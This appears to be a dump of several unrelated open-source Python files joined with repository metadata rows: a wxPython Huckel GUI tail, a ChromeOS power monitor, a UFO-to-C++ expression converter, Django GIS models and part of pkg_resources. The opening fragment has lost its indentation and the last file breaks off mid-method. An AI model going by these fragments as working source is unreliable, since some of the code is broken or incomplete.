self.set_matrix_shape(data.shape)
rows,cols = data.shape
for row in range(rows):
for col in range(cols):
self.huckel_grid.SetCellValue(row,col,"{0}".format(data[row,col]))
#---------------------------------------------------------------------------
def set_matrix_shape(self,shape):
"""set the huckel matrix shape"""
gui.grid_utils.set_shape(self.huckel_grid,shape)
#----------------------------------------------------------------------
def main():
"""Launch the main program"""
app = wx.App(useBestVisual=True)
frame = MainFrame(None)
frame.Show()
app.MainLoop()
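# Hypothetical usage sketch (not part of the original module): the solver is
# fed a square numpy matrix like the one assembled by get_huckel_data(); the
# three-site chain below is a made-up example, not data from the application.
def _example_solver_run():
    data = numpy.matrix([[0., 1., 0.],
                         [1., 0., 1.],
                         [0., 1., 0.]])
    solver = shmo.HuckelSolver()
    solver.set_data(data, num_electrons=2)
    return solver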
if __name__ == "__main__":
main() | bsd-3-clause | -4,218,916,548,015,141,000 | 36.701493 | 90 | 0.457426 | false |
hefen1/chromium | tools/telemetry/telemetry/core/platform/power_monitor/cros_power_monitor.py | 2 | 5726 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
import re
from telemetry import decorators
from telemetry.core.platform.power_monitor import sysfs_power_monitor
class CrosPowerMonitor(sysfs_power_monitor.SysfsPowerMonitor):
"""PowerMonitor that relies on 'dump_power_status' to monitor power
consumption of a single ChromeOS application.
"""
def __init__(self, platform_backend):
"""Constructor.
Args:
platform_backend: A LinuxBasedPlatformBackend object.
Attributes:
_initial_power: The result of 'dump_power_status' before the test.
_start_time: The epoch time at which the test starts executing.
"""
super(CrosPowerMonitor, self).__init__(platform_backend)
self._initial_power = None
self._start_time = None
@decorators.Cache
def CanMonitorPower(self):
return super(CrosPowerMonitor, self).CanMonitorPower()
def StartMonitoringPower(self, browser):
super(CrosPowerMonitor, self).StartMonitoringPower(browser)
if self._IsOnBatteryPower():
sample = self._platform.RunCommand(['dump_power_status;', 'date', '+%s'])
self._initial_power, self._start_time = CrosPowerMonitor.SplitSample(
sample)
def StopMonitoringPower(self):
cpu_stats = super(CrosPowerMonitor, self).StopMonitoringPower()
power_stats = {}
if self._IsOnBatteryPower():
sample = self._platform.RunCommand(['dump_power_status;', 'date', '+%s'])
final_power, end_time = CrosPowerMonitor.SplitSample(sample)
# The length of the test is used to measure energy consumption.
length_h = (end_time - self._start_time) / 3600.0
power_stats = CrosPowerMonitor.ParsePower(self._initial_power,
final_power, length_h)
return CrosPowerMonitor.CombineResults(cpu_stats, power_stats)
@staticmethod
def SplitSample(sample):
"""Splits a power and time sample into the two separate values.
Args:
sample: The result of calling 'dump_power_status; date +%s' on the
device.
Returns:
A tuple of power sample and epoch time of the sample.
"""
sample = sample.strip()
index = sample.rfind('\n')
power = sample[:index]
time = sample[index + 1:]
return power, int(time)
@staticmethod
def IsOnBatteryPower(status, board):
"""Determines if the devices is being charged.
Args:
status: The parsed result of 'dump_power_status'
board: The name of the board running the test.
Returns:
True if the device is on battery power; False otherwise.
"""
on_battery = status['line_power_connected'] == '0'
# Butterfly can incorrectly report AC online for some time after unplug.
# Check battery discharge state to confirm.
if board == 'butterfly':
on_battery |= status['battery_discharging'] == '1'
return on_battery
def _IsOnBatteryPower(self):
"""Determines if the device is being charged.
Returns:
True if the device is on battery power; False otherwise.
"""
status = CrosPowerMonitor.ParsePowerStatus(
self._platform.RunCommand(['dump_power_status']))
board_data = self._platform.RunCommand(['cat', '/etc/lsb-release'])
board = re.search('BOARD=(.*)', board_data).group(1)
return CrosPowerMonitor.IsOnBatteryPower(status, board)
@staticmethod
def ParsePowerStatus(sample):
"""Parses 'dump_power_status' command output.
Args:
sample: The output of 'dump_power_status'
Returns:
Dictionary containing all fields from 'dump_power_status'
"""
rv = collections.defaultdict(dict)
for ln in sample.splitlines():
words = ln.split()
assert len(words) == 2
rv[words[0]] = words[1]
return dict(rv)
@staticmethod
def ParsePower(initial_stats, final_stats, length_h):
"""Parse output of 'dump_power_status'
Args:
initial_stats: The output of 'dump_power_status' before the test.
final_stats: The output of 'dump_power_status' after the test.
length_h: The length of the test in hours.
Returns:
Dictionary in the format returned by StopMonitoringPower().
"""
out_dict = {'identifier': 'dump_power_status'}
component_utilization = {}
initial = CrosPowerMonitor.ParsePowerStatus(initial_stats)
final = CrosPowerMonitor.ParsePowerStatus(final_stats)
# The charge value reported by 'dump_power_status' is not precise enough to
# give meaningful results across shorter tests, so average energy rate and
# the length of the test are used.
initial_power_mw = float(initial['battery_energy_rate']) * 10 ** 3
final_power_mw = float(final['battery_energy_rate']) * 10 ** 3
average_power_mw = (initial_power_mw + final_power_mw) / 2.0
out_dict['power_samples_mw'] = [initial_power_mw, final_power_mw]
out_dict['energy_consumption_mwh'] = average_power_mw * length_h
# Duplicating CrOS battery fields where applicable.
battery = {}
battery['charge_full'] = float(final['battery_charge_full'])
battery['charge_full_design'] = (
float(final['battery_charge_full_design']))
battery['charge_now'] = float(final['battery_charge'])
battery['current_now'] = float(final['battery_current'])
battery['energy'] = float(final['battery_energy'])
battery['energy_rate'] = float(final['battery_energy_rate'])
battery['voltage_now'] = float(final['battery_voltage'])
component_utilization['battery'] = battery
out_dict['component_utilization'] = component_utilization
return out_dict
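# Illustrative sketch (not part of the Chromium source): ParsePowerStatus
# simply splits each "key value" line into one dict entry, so a fabricated
# two-line sample parses as shown below.
def _ExampleParsePowerStatus():
  sample = 'line_power_connected 0\nbattery_energy_rate 5.25'
  status = CrosPowerMonitor.ParsePowerStatus(sample)
  # status == {'line_power_connected': '0', 'battery_energy_rate': '5.25'}
  return status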
| bsd-3-clause | -7,981,824,072,240,068,000 | 36.424837 | 79 | 0.676388 | false |
cms-externals/sherpa | MODEL/UFO/py_to_cpp.py | 1 | 3556 | """
Conversion of python expressions to C++ compatible strings.
This code is based on 'converter.py', part of the HERWIG++ UFO interface.
Many thanks to David Grellscheid for the permission to use this code.
Does not support custom functions other than the ones in the cmath_dictionary defined below.
Does not support the complex atan function (a C++11 feature).
"""
import ast
from ufo_exception import ufo_exception
# how to translate cmath python names
# into names appropriate for C++
cmath_dictionary = {
"cos": "cos",
"sin": "sin",
"tan": "tan",
"acos": "acos",
"asin": "asin",
"atan": "atan",
"sqrt": "sqrt",
"pi": "M_PI",
"log":"log"
}
def py_to_cpp(expr):
return cpp_visitor().cpp_string(expr)
def c_string_from_num(num):
# where this is used, we have 'complex' typedef'd
if isinstance(num, complex):
if num == 0:
return "(0.0)"
return "(complex({0},{1}))".format(num.real,num.imag)
# do not want integers floating around in generated c code
if isinstance(num, int):
return "({0})".format(float(num))
if isinstance(num, float):
return "({0})".format(num)
raise ufo_exception("Can't convert {0}".format(num))
class cpp_visitor(ast.NodeVisitor):
def __init__(self):
pass
def cpp_string(self, expr):
self.string = ""
self.vars = set()
self.visit(ast.parse(expr))
return self.string
def generic_visit(self, node):
raise NotImplementedError("Node of type \"{0}\" is not implemented".format(type(node).__name__))
def pass_super(self,node):
super(type(self),self).generic_visit(node)
def visit_Module(self, node):
self.pass_super(node)
def visit_Expr(self, node):
self.pass_super(node)
def visit_Attribute(self,node):
if node.value.id != "cmath":
raise NotImplementedError("Attribute \"{0}\" is not implemented".format(node.value.id))
self.string += cmath_dictionary[node.attr]
def visit_UnaryOp(self,node):
self.string += "("
self.visit(node.op)
self.visit(node.operand)
self.string += ")"
def visit_BinOp(self, node):
if type(node.op) == type(ast.Pow()):
self.handle_power(node)
else:
self.string += "("
self.visit(node.left)
self.visit(node.op)
self.visit(node.right)
self.string += ")"
def handle_power(self, node):
self.string += "pow("
self.visit(node.left)
self.string += ","
self.visit(node.right)
self.string += ")"
def visit_Call(self,node):
self.visit(node.func)
self.string += "("
if len(node.args) > 0:
self.visit(node.args[0])
for a in node.args[1:]:
self.string += ","
self.visit(a)
self.string += ")"
def visit_Name(self,node):
text = str(node.id)
self.vars.add(text)
self.string += text
def visit_Num(self, node):
# some zeros are encoded as 0j
self.string += "0.0" if node.n == 0 else str(float(node.n))
def visit_Mult(self, node):
self.string += "*"
def visit_Add(self, node):
self.string += "+"
def visit_Sub(self, node):
self.string += "-"
def visit_USub(self, node):
self.string += "-"
def visit_UAdd(self, node):
self.string += "+"
def visit_Div(self, node):
self.string += "/"
| gpl-3.0 | -9,153,510,512,711,954,000 | 26.353846 | 104 | 0.566929 | false |
RubenSchmidt/giscademy | layers/models.py | 1 | 1095 | from django.contrib.gis.db.models import MultiPolygonField, PointField, LineStringField
from django.contrib.postgres.fields import JSONField
from django.db import models
from giscademy.utils.model_utils import Timestampable
class Layer(Timestampable):
name = models.CharField(max_length=255)
exercise = models.ForeignKey('courses.Exercise', blank=True, null=True, on_delete=models.SET_NULL)
user = models.ForeignKey('auth.User', blank=True, null=True)
def __str__(self):
return self.name
@property
def points(self):
return self.point_set.all()
@property
def linestrings(self):
return self.linestring_set.all()
@property
def polygons(self):
return self.polygon_set.all()
class Feature(Timestampable):
layer = models.ForeignKey(
'layers.Layer'
)
properties = JSONField(null=True, blank=True)
class Meta:
abstract = True
class Point(Feature):
geom = PointField()
class LineString(Feature):
geom = LineStringField()
class Polygon(Feature):
geom = MultiPolygonField()
| mit | 9,149,400,294,067,611,000 | 21.8125 | 102 | 0.693151 | false |
cntnboys/cmput410-project | venv/lib/python2.7/site-packages/pkg_resources/__init__.py | 16 | 103944 | """
Package resource API
--------------------
A resource is a logical file contained within a package, or a logical
subdirectory thereof. The package resource API expects resource names
to have their path parts separated with ``/``, *not* whatever the local
path separator is. Do not use os.path operations to manipulate resource
names being passed into the API.
The package resource API is designed to work with normal filesystem packages,
.egg files, and unpacked .egg files. It can also work in a limited way with
.zip files and with custom PEP 302 loaders that support the ``get_data()``
method.
"""
from __future__ import absolute_import
import sys
import os
import io
import time
import re
import imp
import zipfile
import zipimport
import warnings
import stat
import functools
import pkgutil
import token
import symbol
import operator
import platform
import collections
import plistlib
import email.parser
import tempfile
from pkgutil import get_importer
PY3 = sys.version_info > (3,)
PY2 = not PY3
if PY3:
from urllib.parse import urlparse, urlunparse
if PY2:
from urlparse import urlparse, urlunparse
if PY3:
string_types = str,
else:
string_types = str, eval('unicode')
# capture these to bypass sandboxing
from os import utime
try:
from os import mkdir, rename, unlink
WRITE_SUPPORT = True
except ImportError:
# no write support, probably under GAE
WRITE_SUPPORT = False
from os import open as os_open
from os.path import isdir, split
# Avoid try/except due to potential problems with delayed import mechanisms.
if sys.version_info >= (3, 3) and sys.implementation.name == "cpython":
import importlib._bootstrap as importlib_bootstrap
else:
importlib_bootstrap = None
try:
import parser
except ImportError:
pass
try:
import pkg_resources._vendor.packaging.version
import pkg_resources._vendor.packaging.specifiers
packaging = pkg_resources._vendor.packaging
except ImportError:
# fallback to naturally-installed version; allows system packagers to
# omit vendored packages.
import packaging.version
import packaging.specifiers
class PEP440Warning(RuntimeWarning):
"""
Used when there is an issue with a version or specifier not complying with
PEP 440.
"""
class _SetuptoolsVersionMixin(object):
def __hash__(self):
return super(_SetuptoolsVersionMixin, self).__hash__()
def __lt__(self, other):
if isinstance(other, tuple):
return tuple(self) < other
else:
return super(_SetuptoolsVersionMixin, self).__lt__(other)
def __le__(self, other):
if isinstance(other, tuple):
return tuple(self) <= other
else:
return super(_SetuptoolsVersionMixin, self).__le__(other)
def __eq__(self, other):
if isinstance(other, tuple):
return tuple(self) == other
else:
return super(_SetuptoolsVersionMixin, self).__eq__(other)
def __ge__(self, other):
if isinstance(other, tuple):
return tuple(self) >= other
else:
return super(_SetuptoolsVersionMixin, self).__ge__(other)
def __gt__(self, other):
if isinstance(other, tuple):
return tuple(self) > other
else:
return super(_SetuptoolsVersionMixin, self).__gt__(other)
def __ne__(self, other):
if isinstance(other, tuple):
return tuple(self) != other
else:
return super(_SetuptoolsVersionMixin, self).__ne__(other)
def __getitem__(self, key):
return tuple(self)[key]
def __iter__(self):
component_re = re.compile(r'(\d+ | [a-z]+ | \.| -)', re.VERBOSE)
replace = {
'pre': 'c',
'preview': 'c',
'-': 'final-',
'rc': 'c',
'dev': '@',
}.get
def _parse_version_parts(s):
for part in component_re.split(s):
part = replace(part, part)
if not part or part == '.':
continue
if part[:1] in '0123456789':
# pad for numeric comparison
yield part.zfill(8)
else:
yield '*'+part
# ensure that alpha/beta/candidate are before final
yield '*final'
def old_parse_version(s):
parts = []
for part in _parse_version_parts(s.lower()):
if part.startswith('*'):
# remove '-' before a prerelease tag
if part < '*final':
while parts and parts[-1] == '*final-':
parts.pop()
# remove trailing zeros from each series of numeric parts
while parts and parts[-1] == '00000000':
parts.pop()
parts.append(part)
return tuple(parts)
# Warn for use of this function
warnings.warn(
"You have iterated over the result of "
"pkg_resources.parse_version. This is a legacy behavior which is "
"inconsistent with the new version class introduced in setuptools "
"8.0. That class should be used directly instead of attempting to "
"iterate over the result.",
RuntimeWarning,
stacklevel=1,
)
for part in old_parse_version(str(self)):
yield part
class SetuptoolsVersion(_SetuptoolsVersionMixin, packaging.version.Version):
pass
class SetuptoolsLegacyVersion(_SetuptoolsVersionMixin,
packaging.version.LegacyVersion):
pass
def parse_version(v):
try:
return SetuptoolsVersion(v)
except packaging.version.InvalidVersion:
return SetuptoolsLegacyVersion(v)
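# Illustrative sketch (not in the original source): parse_version applies
# PEP 440 ordering, so numeric parts compare numerically and dev releases
# sort before the corresponding final release; anything unparseable falls
# back to the legacy scheme.
def _parse_version_examples():
    assert parse_version("1.10") > parse_version("1.2.1")
    assert parse_version("1.0.dev1") < parse_version("1.0")
    assert isinstance(parse_version("not-a-version"), SetuptoolsLegacyVersion)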
_state_vars = {}
def _declare_state(vartype, **kw):
globals().update(kw)
_state_vars.update(dict.fromkeys(kw, vartype))
def __getstate__():
state = {}
g = globals()
for k, v in _state_vars.items():
state[k] = g['_sget_'+v](g[k])
return state
def __setstate__(state):
g = globals()
for k, v in state.items():
g['_sset_'+_state_vars[k]](k, g[k], v)
return state
def _sget_dict(val):
return val.copy()
def _sset_dict(key, ob, state):
ob.clear()
ob.update(state)
def _sget_object(val):
return val.__getstate__()
def _sset_object(key, ob, state):
ob.__setstate__(state)
_sget_none = _sset_none = lambda *args: None
def get_supported_platform():
"""Return this platform's maximum compatible version.
distutils.util.get_platform() normally reports the minimum version
of Mac OS X that would be required to *use* extensions produced by
distutils. But what we want when checking compatibility is to know the
version of Mac OS X that we are *running*. To allow usage of packages that
explicitly require a newer version of Mac OS X, we must also know the
current version of the OS.
If this condition occurs for any other platform with a version in its
platform strings, this function should be extended accordingly.
"""
plat = get_build_platform()
m = macosVersionString.match(plat)
if m is not None and sys.platform == "darwin":
try:
plat = 'macosx-%s-%s' % ('.'.join(_macosx_vers()[:2]), m.group(3))
except ValueError:
# not Mac OS X
pass
return plat
__all__ = [
# Basic resource access and distribution/entry point discovery
'require', 'run_script', 'get_provider', 'get_distribution',
'load_entry_point', 'get_entry_map', 'get_entry_info',
'iter_entry_points',
'resource_string', 'resource_stream', 'resource_filename',
'resource_listdir', 'resource_exists', 'resource_isdir',
# Environmental control
'declare_namespace', 'working_set', 'add_activation_listener',
'find_distributions', 'set_extraction_path', 'cleanup_resources',
'get_default_cache',
# Primary implementation classes
'Environment', 'WorkingSet', 'ResourceManager',
'Distribution', 'Requirement', 'EntryPoint',
# Exceptions
'ResolutionError', 'VersionConflict', 'DistributionNotFound',
'UnknownExtra', 'ExtractionError',
# Warnings
'PEP440Warning',
# Parsing functions and string utilities
'parse_requirements', 'parse_version', 'safe_name', 'safe_version',
'get_platform', 'compatible_platforms', 'yield_lines', 'split_sections',
'safe_extra', 'to_filename', 'invalid_marker', 'evaluate_marker',
# filesystem utilities
'ensure_directory', 'normalize_path',
# Distribution "precedence" constants
'EGG_DIST', 'BINARY_DIST', 'SOURCE_DIST', 'CHECKOUT_DIST', 'DEVELOP_DIST',
# "Provider" interfaces, implementations, and registration/lookup APIs
'IMetadataProvider', 'IResourceProvider', 'FileMetadata',
'PathMetadata', 'EggMetadata', 'EmptyProvider', 'empty_provider',
'NullProvider', 'EggProvider', 'DefaultProvider', 'ZipProvider',
'register_finder', 'register_namespace_handler', 'register_loader_type',
'fixup_namespace_packages', 'get_importer',
# Deprecated/backward compatibility only
'run_main', 'AvailableDistributions',
]
class ResolutionError(Exception):
"""Abstract base for dependency resolution errors"""
def __repr__(self):
return self.__class__.__name__+repr(self.args)
class VersionConflict(ResolutionError):
"""An already-installed version conflicts with the requested version"""
class DistributionNotFound(ResolutionError):
"""A requested distribution was not found"""
class UnknownExtra(ResolutionError):
"""Distribution doesn't have an "extra feature" of the given name"""
_provider_factories = {}
PY_MAJOR = sys.version[:3]
EGG_DIST = 3
BINARY_DIST = 2
SOURCE_DIST = 1
CHECKOUT_DIST = 0
DEVELOP_DIST = -1
def register_loader_type(loader_type, provider_factory):
"""Register `provider_factory` to make providers for `loader_type`
`loader_type` is the type or class of a PEP 302 ``module.__loader__``,
and `provider_factory` is a function that, passed a *module* object,
returns an ``IResourceProvider`` for that module.
"""
_provider_factories[loader_type] = provider_factory
def get_provider(moduleOrReq):
"""Return an IResourceProvider for the named module or requirement"""
if isinstance(moduleOrReq, Requirement):
return working_set.find(moduleOrReq) or require(str(moduleOrReq))[0]
try:
module = sys.modules[moduleOrReq]
except KeyError:
__import__(moduleOrReq)
module = sys.modules[moduleOrReq]
loader = getattr(module, '__loader__', None)
return _find_adapter(_provider_factories, loader)(module)
def _macosx_vers(_cache=[]):
if not _cache:
version = platform.mac_ver()[0]
# fallback for MacPorts
if version == '':
plist = '/System/Library/CoreServices/SystemVersion.plist'
if os.path.exists(plist):
if hasattr(plistlib, 'readPlist'):
plist_content = plistlib.readPlist(plist)
if 'ProductVersion' in plist_content:
version = plist_content['ProductVersion']
_cache.append(version.split('.'))
return _cache[0]
def _macosx_arch(machine):
return {'PowerPC': 'ppc', 'Power_Macintosh': 'ppc'}.get(machine, machine)
def get_build_platform():
"""Return this platform's string for platform-specific distributions
XXX Currently this is the same as ``distutils.util.get_platform()``, but it
needs some hacks for Linux and Mac OS X.
"""
try:
# Python 2.7 or >=3.2
from sysconfig import get_platform
except ImportError:
from distutils.util import get_platform
plat = get_platform()
if sys.platform == "darwin" and not plat.startswith('macosx-'):
try:
version = _macosx_vers()
machine = os.uname()[4].replace(" ", "_")
return "macosx-%d.%d-%s" % (int(version[0]), int(version[1]),
_macosx_arch(machine))
except ValueError:
# if someone is running a non-Mac darwin system, this will fall
# through to the default implementation
pass
return plat
macosVersionString = re.compile(r"macosx-(\d+)\.(\d+)-(.*)")
darwinVersionString = re.compile(r"darwin-(\d+)\.(\d+)\.(\d+)-(.*)")
# XXX backward compat
get_platform = get_build_platform
def compatible_platforms(provided, required):
"""Can code for the `provided` platform run on the `required` platform?
Returns true if either platform is ``None``, or the platforms are equal.
XXX Needs compatibility checks for Linux and other unixy OSes.
"""
if provided is None or required is None or provided==required:
# easy case
return True
# Mac OS X special cases
reqMac = macosVersionString.match(required)
if reqMac:
provMac = macosVersionString.match(provided)
# is this a Mac package?
if not provMac:
# this is backwards compatibility for packages built before
# setuptools 0.6. All packages built after this point will
# use the new macosx designation.
provDarwin = darwinVersionString.match(provided)
if provDarwin:
dversion = int(provDarwin.group(1))
macosversion = "%s.%s" % (reqMac.group(1), reqMac.group(2))
if dversion == 7 and macosversion >= "10.3" or \
dversion == 8 and macosversion >= "10.4":
return True
# egg isn't macosx or legacy darwin
return False
# are they the same major version and machine type?
if provMac.group(1) != reqMac.group(1) or \
provMac.group(3) != reqMac.group(3):
return False
# is the required OS major update >= the provided one?
if int(provMac.group(2)) > int(reqMac.group(2)):
return False
return True
# XXX Linux and other platforms' special cases should go here
return False
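# Illustrative checks (not in the original source): a missing platform or an
# exact match is always compatible, while differing non-macOS strings are not.
def _compatible_platform_examples():
    assert compatible_platforms(None, "win32")
    assert compatible_platforms("linux-x86_64", "linux-x86_64")
    assert not compatible_platforms("win32", "linux-x86_64")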
def run_script(dist_spec, script_name):
"""Locate distribution `dist_spec` and run its `script_name` script"""
ns = sys._getframe(1).f_globals
name = ns['__name__']
ns.clear()
ns['__name__'] = name
require(dist_spec)[0].run_script(script_name, ns)
# backward compatibility
run_main = run_script
def get_distribution(dist):
"""Return a current distribution object for a Requirement or string"""
if isinstance(dist, string_types):
dist = Requirement.parse(dist)
if isinstance(dist, Requirement):
dist = get_provider(dist)
if not isinstance(dist, Distribution):
raise TypeError("Expected string, Requirement, or Distribution", dist)
return dist
def load_entry_point(dist, group, name):
"""Return `name` entry point of `group` for `dist` or raise ImportError"""
return get_distribution(dist).load_entry_point(group, name)
def get_entry_map(dist, group=None):
"""Return the entry point map for `group`, or the full entry map"""
return get_distribution(dist).get_entry_map(group)
def get_entry_info(dist, group, name):
"""Return the EntryPoint object for `group`+`name`, or ``None``"""
return get_distribution(dist).get_entry_info(group, name)
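# Hypothetical usage sketch (not in the original source); the distribution and
# script names below are made-up placeholders, not real projects.
def _entry_point_example(dist="example-dist", script="example-tool"):
    """Resolve and return the callable behind a console script."""
    return load_entry_point(dist, "console_scripts", script)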
class IMetadataProvider:
def has_metadata(name):
"""Does the package's distribution contain the named metadata?"""
def get_metadata(name):
"""The named metadata resource as a string"""
def get_metadata_lines(name):
"""Yield named metadata resource as list of non-blank non-comment lines
Leading and trailing whitespace is stripped from each line, and lines
with ``#`` as the first non-blank character are omitted."""
def metadata_isdir(name):
"""Is the named metadata a directory? (like ``os.path.isdir()``)"""
def metadata_listdir(name):
"""List of metadata names in the directory (like ``os.listdir()``)"""
def run_script(script_name, namespace):
"""Execute the named script in the supplied namespace dictionary"""
class IResourceProvider(IMetadataProvider):
"""An object that provides access to package resources"""
def get_resource_filename(manager, resource_name):
"""Return a true filesystem path for `resource_name`
`manager` must be an ``IResourceManager``"""
def get_resource_stream(manager, resource_name):
"""Return a readable file-like object for `resource_name`
`manager` must be an ``IResourceManager``"""
def get_resource_string(manager, resource_name):
"""Return a string containing the contents of `resource_name`
`manager` must be an ``IResourceManager``"""
def has_resource(resource_name):
"""Does the package contain the named resource?"""
def resource_isdir(resource_name):
"""Is the named resource a directory? (like ``os.path.isdir()``)"""
def resource_listdir(resource_name):
"""List of resource names in the directory (like ``os.listdir()``)"""
class WorkingSet(object):
"""A collection of active distributions on sys.path (or a similar list)"""
def __init__(self, entries=None):
"""Create working set from list of path entries (default=sys.path)"""
self.entries = []
self.entry_keys = {}
self.by_key = {}
self.callbacks = []
if entries is None:
entries = sys.path
for entry in entries:
self.add_entry(entry)
@classmethod
def _build_master(cls):
"""
Prepare the master working set.
"""
ws = cls()
try:
from __main__ import __requires__
except ImportError:
# The main program does not list any requirements
return ws
# ensure the requirements are met
try:
ws.require(__requires__)
except VersionConflict:
return cls._build_from_requirements(__requires__)
return ws
@classmethod
def _build_from_requirements(cls, req_spec):
"""
Build a working set from a requirement spec. Rewrites sys.path.
"""
# try it without defaults already on sys.path
# by starting with an empty path
ws = cls([])
reqs = parse_requirements(req_spec)
dists = ws.resolve(reqs, Environment())
for dist in dists:
ws.add(dist)
# add any missing entries from sys.path
for entry in sys.path:
if entry not in ws.entries:
ws.add_entry(entry)
# then copy back to sys.path
sys.path[:] = ws.entries
return ws
def add_entry(self, entry):
"""Add a path item to ``.entries``, finding any distributions on it
``find_distributions(entry, True)`` is used to find distributions
corresponding to the path entry, and they are added. `entry` is
always appended to ``.entries``, even if it is already present.
(This is because ``sys.path`` can contain the same value more than
once, and the ``.entries`` of the ``sys.path`` WorkingSet should always
equal ``sys.path``.)
"""
self.entry_keys.setdefault(entry, [])
self.entries.append(entry)
for dist in find_distributions(entry, True):
self.add(dist, entry, False)
def __contains__(self, dist):
"""True if `dist` is the active distribution for its project"""
return self.by_key.get(dist.key) == dist
def find(self, req):
"""Find a distribution matching requirement `req`
If there is an active distribution for the requested project, this
returns it as long as it meets the version requirement specified by
`req`. But, if there is an active distribution for the project and it
does *not* meet the `req` requirement, ``VersionConflict`` is raised.
If there is no active distribution for the requested project, ``None``
is returned.
"""
dist = self.by_key.get(req.key)
if dist is not None and dist not in req:
# XXX add more info
raise VersionConflict(dist, req)
else:
return dist
def iter_entry_points(self, group, name=None):
"""Yield entry point objects from `group` matching `name`
If `name` is None, yields all entry points in `group` from all
distributions in the working set, otherwise only ones matching
both `group` and `name` are yielded (in distribution order).
"""
for dist in self:
entries = dist.get_entry_map(group)
if name is None:
for ep in entries.values():
yield ep
elif name in entries:
yield entries[name]
def run_script(self, requires, script_name):
"""Locate distribution for `requires` and run `script_name` script"""
ns = sys._getframe(1).f_globals
name = ns['__name__']
ns.clear()
ns['__name__'] = name
self.require(requires)[0].run_script(script_name, ns)
def __iter__(self):
"""Yield distributions for non-duplicate projects in the working set
The yield order is the order in which the items' path entries were
added to the working set.
"""
seen = {}
for item in self.entries:
if item not in self.entry_keys:
# workaround a cache issue
continue
for key in self.entry_keys[item]:
if key not in seen:
seen[key]=1
yield self.by_key[key]
def add(self, dist, entry=None, insert=True, replace=False):
"""Add `dist` to working set, associated with `entry`
If `entry` is unspecified, it defaults to the ``.location`` of `dist`.
On exit from this routine, `entry` is added to the end of the working
set's ``.entries`` (if it wasn't already present).
`dist` is only added to the working set if it's for a project that
doesn't already have a distribution in the set, unless `replace=True`.
If it's added, any callbacks registered with the ``subscribe()`` method
will be called.
"""
if insert:
dist.insert_on(self.entries, entry)
if entry is None:
entry = dist.location
keys = self.entry_keys.setdefault(entry,[])
keys2 = self.entry_keys.setdefault(dist.location,[])
if not replace and dist.key in self.by_key:
# ignore hidden distros
return
self.by_key[dist.key] = dist
if dist.key not in keys:
keys.append(dist.key)
if dist.key not in keys2:
keys2.append(dist.key)
self._added_new(dist)
def resolve(self, requirements, env=None, installer=None,
replace_conflicting=False):
"""List all distributions needed to (recursively) meet `requirements`
`requirements` must be a sequence of ``Requirement`` objects. `env`,
if supplied, should be an ``Environment`` instance. If
not supplied, it defaults to all distributions available within any
entry or distribution in the working set. `installer`, if supplied,
will be invoked with each requirement that cannot be met by an
already-installed distribution; it should return a ``Distribution`` or
``None``.
Unless `replace_conflicting=True`, raises a VersionConflict exception if
any requirements are found on the path that have the correct name but
the wrong version. Otherwise, if an `installer` is supplied it will be
invoked to obtain the correct version of the requirement and activate
it.
"""
# set up the stack
requirements = list(requirements)[::-1]
# set of processed requirements
processed = {}
# key -> dist
best = {}
to_activate = []
# Mapping of requirement to set of distributions that required it;
# useful for reporting info about conflicts.
required_by = collections.defaultdict(set)
while requirements:
# process dependencies breadth-first
req = requirements.pop(0)
if req in processed:
# Ignore cyclic or redundant dependencies
continue
dist = best.get(req.key)
if dist is None:
# Find the best distribution and add it to the map
dist = self.by_key.get(req.key)
if dist is None or (dist not in req and replace_conflicting):
ws = self
if env is None:
if dist is None:
env = Environment(self.entries)
else:
# Use an empty environment and workingset to avoid
# any further conflicts with the conflicting
# distribution
env = Environment([])
ws = WorkingSet([])
dist = best[req.key] = env.best_match(req, ws, installer)
if dist is None:
#msg = ("The '%s' distribution was not found on this "
# "system, and is required by this application.")
#raise DistributionNotFound(msg % req)
# unfortunately, zc.buildout uses a str(err)
# to get the name of the distribution here..
raise DistributionNotFound(req)
to_activate.append(dist)
if dist not in req:
# Oops, the "best" so far conflicts with a dependency
tmpl = "%s is installed but %s is required by %s"
args = dist, req, list(required_by.get(req, []))
raise VersionConflict(tmpl % args)
# push the new requirements onto the stack
new_requirements = dist.requires(req.extras)[::-1]
requirements.extend(new_requirements)
# Register the new requirements needed by req
for new_requirement in new_requirements:
required_by[new_requirement].add(req.project_name)
processed[req] = True
# return list of distros to activate
return to_activate
def find_plugins(self, plugin_env, full_env=None, installer=None,
fallback=True):
"""Find all activatable distributions in `plugin_env`
Example usage::
distributions, errors = working_set.find_plugins(
Environment(plugin_dirlist)
)
# add plugins+libs to sys.path
map(working_set.add, distributions)
# display errors
print('Could not load', errors)
The `plugin_env` should be an ``Environment`` instance that contains
only distributions that are in the project's "plugin directory" or
directories. The `full_env`, if supplied, should be an ``Environment``
contains all currently-available distributions. If `full_env` is not
supplied, one is created automatically from the ``WorkingSet`` this
method is called on, which will typically mean that every directory on
``sys.path`` will be scanned for distributions.
`installer` is a standard installer callback as used by the
``resolve()`` method. The `fallback` flag indicates whether we should
attempt to resolve older versions of a plugin if the newest version
cannot be resolved.
This method returns a 2-tuple: (`distributions`, `error_info`), where
`distributions` is a list of the distributions found in `plugin_env`
that were loadable, along with any other distributions that are needed
to resolve their dependencies. `error_info` is a dictionary mapping
unloadable plugin distributions to an exception instance describing the
error that occurred. Usually this will be a ``DistributionNotFound`` or
``VersionConflict`` instance.
"""
plugin_projects = list(plugin_env)
# scan project names in alphabetic order
plugin_projects.sort()
error_info = {}
distributions = {}
if full_env is None:
env = Environment(self.entries)
env += plugin_env
else:
env = full_env + plugin_env
shadow_set = self.__class__([])
# put all our entries in shadow_set
list(map(shadow_set.add, self))
for project_name in plugin_projects:
for dist in plugin_env[project_name]:
req = [dist.as_requirement()]
try:
resolvees = shadow_set.resolve(req, env, installer)
except ResolutionError:
v = sys.exc_info()[1]
# save error info
error_info[dist] = v
if fallback:
# try the next older version of project
continue
else:
# give up on this project, keep going
break
else:
list(map(shadow_set.add, resolvees))
distributions.update(dict.fromkeys(resolvees))
# success, no need to try any more versions of this project
break
distributions = list(distributions)
distributions.sort()
return distributions, error_info
def require(self, *requirements):
"""Ensure that distributions matching `requirements` are activated
`requirements` must be a string or a (possibly-nested) sequence
thereof, specifying the distributions and versions required. The
return value is a sequence of the distributions that needed to be
activated to fulfill the requirements; all relevant distributions are
included, even if they were already activated in this working set.
"""
needed = self.resolve(parse_requirements(requirements))
for dist in needed:
self.add(dist)
return needed
def subscribe(self, callback):
"""Invoke `callback` for all distributions (including existing ones)"""
if callback in self.callbacks:
return
self.callbacks.append(callback)
for dist in self:
callback(dist)
def _added_new(self, dist):
